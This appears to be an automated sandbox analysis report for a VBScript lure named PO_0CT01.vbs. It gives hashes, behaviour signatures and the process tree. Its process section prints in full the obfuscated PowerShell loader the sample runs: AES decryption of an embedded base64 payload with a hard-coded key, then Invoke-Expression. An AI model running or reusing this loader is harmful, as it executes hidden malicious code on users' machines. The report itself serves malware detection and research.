18f41f2a39ff37e43e2a8e01b0447d613257682929e0d5383458935d8279773c

Analysis

max time kernel
122s
max time network
125s
platform
windows7_x64
resource
win7-20231020-en
resource tags

arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
submitted
01-12-2023 06:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PO_0CT01.vbs
Size

159KB
MD5

dcef6132db05f9704623b495b05c1e4a
SHA1

ec64670ba9e10bf41fa634be3f8b7c5bec0f719b
SHA256

18f41f2a39ff37e43e2a8e01b0447d613257682929e0d5383458935d8279773c
SHA512

6c4eef2875783152687021060b390269e7de5756bcdf45f26880a83a8b65e99240483be5cf72caec6210c706060b53f03ebbf49a46685b4b747fa9c1e27b5b5d
SSDEEP

1536:vSBSNS2SNSJSNSImSNSzSNSmSNS8SNSySNSaSNS1SP:v0YzYsYeYmYTY5YHYPYQg

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1376 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1376 powershell.exe

pid	process
1376	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1376	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 2540 wrote to memory of 1376	2540	WScript.exe	powershell.exe
PID 2540 wrote to memory of 1376	2540	WScript.exe	powershell.exe
PID 2540 wrote to memory of 1376	2540	WScript.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO_0CT01.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function Decrypt-AESEncryption{Param([String]$CBGNKODNPÇ,[String]$Keygfhfghfgiy)$OGjnLfnOaç = New-Object System.Security.Cryptography.AesManaged;$OGjnLfnOaç.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OGjnLfnOaç.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$OGjnLfnOaç.BlockSize = 128;$OGjnLfnOaç.KeySize = 256;$OGjnLfnOaç.Key = (New-Object System.Security.Cryptography.SHA256Managed).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Keygfhfghfgiy));$BxwZvbgNLo = [System.Convert]::FromBase64String($CBGNKODNPÇ);$OGjnLfnOaç.IV = $BxwZvbgNLo[0..15];$decryptor = $OGjnLfnOaç.CreateDecryptor();$geLJgUoUQL = $decryptor.TransformFinalBlock($BxwZvbgNLo, 16, $BxwZvbgNLo.Length - 16);$OGjnLfnOaç.Dispose();return [System.Text.Encoding]::UTF8.GetString($geLJgUoUQL).Trim([char]0)}$qROuE = '23176310927586413792';$MqDDxKjJmA = 'FoGLCjqpRliJQi11hCtAOF81slvtFOGU9rZ8dC2DlzWrXEyqWGUQQOHJW5CgkrG9HiJw7HT3KtpsBMjn67ekbpqApBChPtQ/ihi0Nt9z8FNBigpDUVbRtDnwD3Tu6oXpHJLJel6aki1Gm2uQ3RuL+5aSgMLijD4gm6JOGiRWUd+DQTgbDbPxZ6oFmyZwkklfZaNnTUrdcpDLK4js4xG5iZVC3zKEpr76zZsUNix/qoSgK2oeIt45qYtT+EhJoxac39p4cS6IFEob0SYg6VlOCgDluaQvAF4RB2tcFPxfgIuTH1FNl6/Eh9WYo20z/3lwNsHmSbQcHGjhL8cM+ohh5m3hT6JOP7MvwDmFe6HqMDvZ7qRIno7IKJdbRac/vxw84zDypr7pF6HDobu0F/cArm5HCyQ+SkgWSEvzCOp3Mpj1HL9kjiiysv3IPllMuWG5F2W9IN8n0u8aCKMMph1skC9W3mYwLv2bVNqzOV1YeGj9oayIf6BmVQlKi39Fv39mocGla8Z74nek8ELKCP9pHXdL8KjXUQercNkF3xKjdsC/Fx1bn+HHzXw3YABqH6U0CA4bqBLyNJuFlN9F1KmeZh/qEYHrWFJvlUV8YcXDYn8f5aK4RwqaaKE5GgFslt39QkHEkYtd4ijirDyGZ08vMTVNd5qxgSJmbAMhkzpfdIyywqXvUBz213IP+o0HfT0A0MgCisgtdX4i5xJZ0kB4azjFZ8PpSfO87gVtgE4jJhsWK9w7FOAZgaNj0i6ovZ7fsK2XXa4GIgF3UajMao5ITbyi3/rb3ANXX+zIUBb+U7DumftlEauMlYY09L9Nh+y1eeHK17CBzcEAILXg56LQJrv6rE3sFaWkAnmUlIUpGNT+SwBTZkK080gVlk2jrY6qJ+eb1d1kK49HlqvKT8bM1EK+nOEvOSyzlIL2ogfhjs6o2a24qtsD9Fh9ou+zbo3aZLK0VwfZx+4gaYQgREUtctIFT9uxSsPMhikmm9fLDZp21+SIzwfSM2fCG1KP56d3jePTR9lhXrZYqX2P9zLNviWqm+jwwURjmeEljvzioyhzmtJ+z5Cr1Pl/w87XTBliumSakj6M86L1Phi0ZORYzicjvALjdsa0GhwyOaOkULl99w8dEwJiZvF6SP/FB3JiYrF3rdqXlLGcZwvZ4xVIoprzWyb98JbKykcExHMBepLzGCe4ca773/Ikiv8lFXJI31KLYJShBcWnUe1lIk7hTZCCP0d8BUEdE3d4fumE3KN8MuyvO7VyzBEGsCKd5QoEW6fKJNl9Y30jwALwq+rhfUMv0Xyxj93w8eApWbx/zh5RaBjmY9ifQETWKwK3tT+LaLdd1Ww/vvPPbAr/HedbdlVdxT1KTyFGExQjSBWDeotvmUkcD6+usolisMw7y93SbQys388JGPJSQCADs5ULDDbE04R2eWBgnUSHSrl57Mp6EVKBhoIVYym6V8lSbq/nQNr7LeeAHuxr98QbQNdu3aguSrF8Mw6yY5pwfhqFl4elRXiP/9/hSD9WZEcSPrs8jeZlgK17K+vxfzr0jg2JL0B5gAyTanNw+zQkmANpOhkMj4ilJ5+dRFMTT7/JW12ZnclRQFtBtTtFgW9qeLzWaE5N2OLr3MTcux2+/OxiSdSUM9paK2l1wALhUoIp1I/TWxQsbyE0dFMC40Qes/fQl4QuMWm7C+xV3hxnHC9Np+zl5gj4M4J35KIB4hWYxmTHvYKeNU6amsgzAvKnToKUqQ==';$GmtBWLkcKU = Decrypt-AESEncryption -CBGNKODNPÇ $MqDDxKjJmA -Key $qROuE;Invoke-Expression $GmtBWLkcKU
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1376

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1376-4-0x000000001B360000-0x000000001B642000-memory.dmp

Filesize
2.9MB

Download
memory/1376-5-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download
memory/1376-6-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

Filesize
9.6MB

Download
memory/1376-7-0x0000000002AF0000-0x0000000002B70000-memory.dmp

Filesize
512KB

Download
memory/1376-8-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

Filesize
9.6MB

Download
memory/1376-9-0x0000000002AF0000-0x0000000002B70000-memory.dmp

Filesize
512KB

Download
memory/1376-10-0x0000000002AF0000-0x0000000002B70000-memory.dmp

Filesize
512KB

Download
memory/1376-11-0x0000000002AF0000-0x0000000002B70000-memory.dmp

Filesize
512KB

Download
memory/1376-12-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

Filesize
9.6MB

Download